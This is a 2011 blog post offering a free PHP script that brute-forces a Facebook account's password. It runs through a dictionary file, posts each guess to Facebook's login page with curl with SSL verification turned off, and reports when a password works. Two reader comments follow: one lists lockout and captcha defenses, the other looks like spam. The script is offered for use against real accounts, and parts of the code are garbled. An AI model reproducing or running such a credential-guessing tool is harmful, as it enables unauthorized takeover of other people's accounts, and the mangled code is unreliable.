Friday, December 30, 2011

[Free!][New!]FaceBook Bruteforce PHP script

Hello, first of all im not the coder

To run it, you need a web server with apache

you need to edit the code, its easy, i think you will understand .


PHP Code:
###############################
# Face Book Brute Forcer
################################
#Miracle-Ubers.org
################################
set_time_limit(0); $username ="brute@force.org"// username to brute force $dictionary ="dictionary.txt"// need dictionary to password list
 
function kontrol($kullaniciadi,$sifre){ $useragent "Opera/9.21 (Windows NT 5.1; U; tr)"$data "email=$kullaniciadi&pass=$sifre&login=Login" $ch curl_init('https://login.facebook.com/login.php?m&next=http://m.facebook.com/home.php'); curl_setopt($chCURLOPT_HEADER0); curl_setopt($chCURLOPT_FOLLOWLOCATION1); curl_setopt($chCURLOPT_SSL_VERIFYPEERfalse); curl_setopt($chCURLOPT_RETURNTRANSFER1); curl_setopt($chCURLOPT_POST1); curl_setopt($chCURLOPT_POSTFIELDS$data); curl_setopt($chCURLOPT_USERAGENT$useragent); curl_setopt($chCURLOPT_COOKIEFILE'cookie.txt'); curl_setopt($chCURLOPT_COOKIEJAR'cookie.txt'); $source=curl_exec ($ch); curl_close ($ch);
if(
eregi("Home",$source)){return true;} else {return false;}

}

if(!
is_file($dictionary)){echo "$dictionary is not file";exit;} $lines=file($dictionary);
echo 
"Attack Starting..
"
sleep(10);
echo 
"Attack Started, brute forcing..
"
;
foreach(
$lines as $line){ $line=str_replace("\r","",$line); $line=str_replace("\n","",$line);
if(
kontrol($username,$line)){echo "[+]  username:$username , password:$line - P
assword found : $line
"
;$fp=fopen('cookie.txt','w');fwrite($fp,'');exit;}
else{echo 
"[-] username:$username , password:$line - Password not found  : 
$line
"
;}
?>  



Enjoy

Newer Post Older Post Home

2 comments:

  1. That's good for unprofessional programmer like me... but i can protectect. How?
    1) Removing the php extension. Ex: http://127.0.0.10/
    2) Lock single account from many different IP addr. || 100 of usernames from the same IP addr.
    3) Use a capatcha

    ReplyDelete
  2. is quite unique from other social networking websites with a blue theme and easy sign-up. But some can change your Facebook Login screen to see your data. www.facebook.com log in

    ReplyDelete